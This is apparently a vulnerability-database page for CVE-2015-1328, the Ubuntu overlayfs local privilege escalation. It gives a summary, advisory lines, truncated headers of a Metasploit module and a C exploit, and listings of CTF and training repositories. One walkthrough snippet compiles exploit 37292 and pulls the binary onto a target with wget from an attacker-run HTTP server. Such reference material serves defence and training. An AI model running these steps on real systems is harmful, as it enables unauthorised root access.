7.8
CVSSv3

CVE-2015-1328

Published: 28/11/2016 Updated: 21/11/2024

Vulnerability Summary

The overlayfs implementation in the linux (aka Linux kernel) package prior to 3.19.0-21.21 in Ubuntu up to and including 15.04 does not properly check permissions for file creation in the upper filesystem directory, which allows local users to obtain root access by leveraging a configuration in which overlayfs is permitted in an arbitrary mount namespace.

Vulnerability Trend

Vulnerable Product Search on Vulmon Subscribe to Product

canonical ubuntu linux

linux linux kernel

Vendor Advisories

The system could be made to run programs as an administrator ...
The system could be made to crash under certain conditions ...
The system could be made to run programs as an administrator ...
The system could be made to crash under certain conditions ...
The system could be made to run programs as an administrator ...
The system could be made to crash under certain conditions ...
The system could be made to crash under certain conditions ...
The system could be made to run programs as an administrator ...
The system could be made to crash under certain conditions ...
The system could be made to run programs as an administrator ...
The system could be made to run programs as an administrator ...
The system could be made to crash under certain conditions ...
The system could be made to run programs as an administrator ...
The system could be made to run programs as an administrator ...

Exploits

## # This module requires Metasploit: metasploitcom/download # Current source: githubcom/rapid7/metasploit-framework ## require "msf/core" class MetasploitModule < Msf::Exploit::Local Rank = GoodRanking include Msf::Post::File include Msf::Exploit::EXE include Msf::Exploit::FileDropper def initialize(info = {}) ...
/* # Exploit Title: ofsc - overlayfs local root in ubuntu # Date: 2015-06-15 # Exploit Author: rebel # Version: Ubuntu 1204, 1404, 1410, 1504 (Kernels before 2015-06-15) # Tested on: Ubuntu 1204, 1404, 1410, 1504 # CVE : CVE-2015-1328 (peoplecanonicalcom/~ubuntu-security/cve/2015/CVE-2015-1328html) *=*=*=*=*=*=*=*=*=*=*=*=*= ...
The overlayfs filesystem does not correctly check file permissions when creating new files in the upper filesystem directory This can be exploited by an unprivileged process in kernels with CONFIG_USER_NS=y and where overlayfs has the FS_USERNS_MOUNT flag, which allows the mounting of overlayfs inside unprivileged mount namespaces This is the def ...
This Metasploit module attempts to exploit two different CVEs (CVE-2015-1328 and CVE-2015-8660) related to overlayfs ...
The overlayfs filesystem does not correctly check file permissions when creating new files in the upper filesystem directory This can be exploited by an unprivileged process in kernels with CONFIG_USER_NS=y and where overlayfs has the FS_USERNS_MOUNT flag, which allows the mounting of overlayfs inside unprivileged mount namespaces This is the def ...

Github Repositories

Training scenarios for cyber ranges

Cyber Range Scenarios Training scenarios for cloud-based cyber ranges, initially focused on utilizing Google Cloud Platform Available scenarios Scenario name Primary OS Type OS Versions Vulns CVEs Shell Shock example Linux RHEL 7 Shell Shock, libfutex CVE-2014-6271, CVE-2014-3153 overlayfs example Linux Ubuntu 1404 'overlayfs' Local Privilege Escalation CVE-

kernel exploit

CVE-2015-1328-GoldenEye about exploit: The overlayfs implementation in the linux (aka Linux kernel) package before 3190-2121 in Ubuntu through 1504 does not properly check permissions for file creation in the upper filesystem directory, which allows local users to obtain root access by leveraging a configuration in which overlayfs is permitted in an arbitrary mount namespac

Linux Privilege Escalation Learn the fundamentals of Linux privilege escalation From enumeration to exploitation, get hands-on with over 8 different privilege escalation techniques Enumeration what is the hostname of the target system $ hostname $ wade7363 What is the linux kernel version of the target system The uname command gives s

Cyber Range Scenarios Training scenarios for cloud-based cyber ranges, initially focused on utilizing Google Cloud Platform Available scenarios Scenario name Primary OS Type OS Versions Vulns CVEs Shell Shock example Linux RHEL 7 Shell Shock, libfutex CVE-2014-6271, CVE-2014-3153 overlayfs example Linux Ubuntu 1404 'overlayfs' Local Privilege Escalation CVE-

Resolução dos desafios do Beco do XPL - 30 Máquinas em 30 dias

--VM-- desafio 1 - wwwvulnhubcom/entry/hacker-fest-2019,378/ desafio 2 - pentesterlabcom/exercises/s2-052/course desafio 3 - wwwvulnhubcom/entry/droopy-v02,143/ desafio 4 - wwwvulnhubcom/entry/digitalworldlocal-joy,298/ desafio 5 - wwwvulnhubcom/entry/violator-1,153/ desafio 6 - wwwvulnhubcom/entry/w1r3s-101,220/

kernel exploit

CVE-2015-1328-GoldenEye about exploit: The overlayfs implementation in the linux (aka Linux kernel) package before 3190-2121 in Ubuntu through 1504 does not properly check permissions for file creation in the upper filesystem directory, which allows local users to obtain root access by leveraging a configuration in which overlayfs is permitted in an arbitrary mount namespac

PoC collection

PoC Collection Index CVE-2014-4114 -- PowerPoint RCE CVE-2014-6271 -- Shell Shock CVE-2014-6332 -- VBScript RCE in IE CVE-2015-1328 -- Ubuntu local root exploit

This is a cheat sheet on how to use some CVEs for penetration testing. Note: don't be retarded and use this on production environments - especially if you don't have permission or have a backup config in case shit hits the fan.

CVE-Cheat-Sheet This is a cheat sheet on how to use some CVEs for penetration testing Note: don't be retarded and use this on production environments - especially if you don't have permission or have a backup config in case shit hits the fan CVE-2015-1328 Read more What does this CVE do? The overlayfs implementation in the linux (aka Linux kernel) packag

ssh karen@1010171207 hostname wade7363 cat /proc/version 3130-24-generic cat /etc/issue Ubuntu 1404 LTS python --version Python 276 wwwexploit-dbcom/exploits/37292 CVE-2015-1328 gcc 37292c -o ofc sudo python3 -m httpserver --bind 10186119 8080 cd tmp wget 10186119:8080/ofc chmod +x ofc ls -la find / -type f -name 'flag2txt' 2>/

j.info Cybersecurity Blog

Escape on Hack the Box February 21st 2024 Topics: Another medium difficulty Windows box on the TJ Null list Escape Walkthrough Jeeves on Hack the Box February 18th 2024 Topics: Another medium difficulty Windows box on the TJ Null list Jeeves Walkthrough Intelligence on Hack the Box February 13th 2024 Topics: A medium difficult

Linux Privilege Escalation Enumeration Explicando os principais comandos para enumeração hostname Mostra o hostname do usuario logado hostname -I Mostra todos os ips que ele tem uname uname -a ou uname --all Exibe todas as informações disponíveis, incluindo nome do kernel, nome da máquina, versão do kernel, arquitet

Today we are hacking into Tr0ll - a boot-to-root vulnerable machine. It's not a hard machine to hack into but it's a good one to learn new stuff and let the previous knowledge sink in.

CTF #3 - Tr0ll Today we are hacking into Tr0ll - a boot-to-root vulnerable machine It's not a hard machine to hack into but it's a good one to learn new stuff and let the previous knowledge sink in As always, let's start with my setup: My Setup A VirtualBox VM running Kali Linux Another VM running Tr0ll You can download it here A local network for both mach

kernel exploit

CVE-2015-1328-GoldenEye about exploit: The overlayfs implementation in the linux (aka Linux kernel) package before 3190-2121 in Ubuntu through 1504 does not properly check permissions for file creation in the upper filesystem directory, which allows local users to obtain root access by leveraging a configuration in which overlayfs is permitted in an arbitrary mount namespac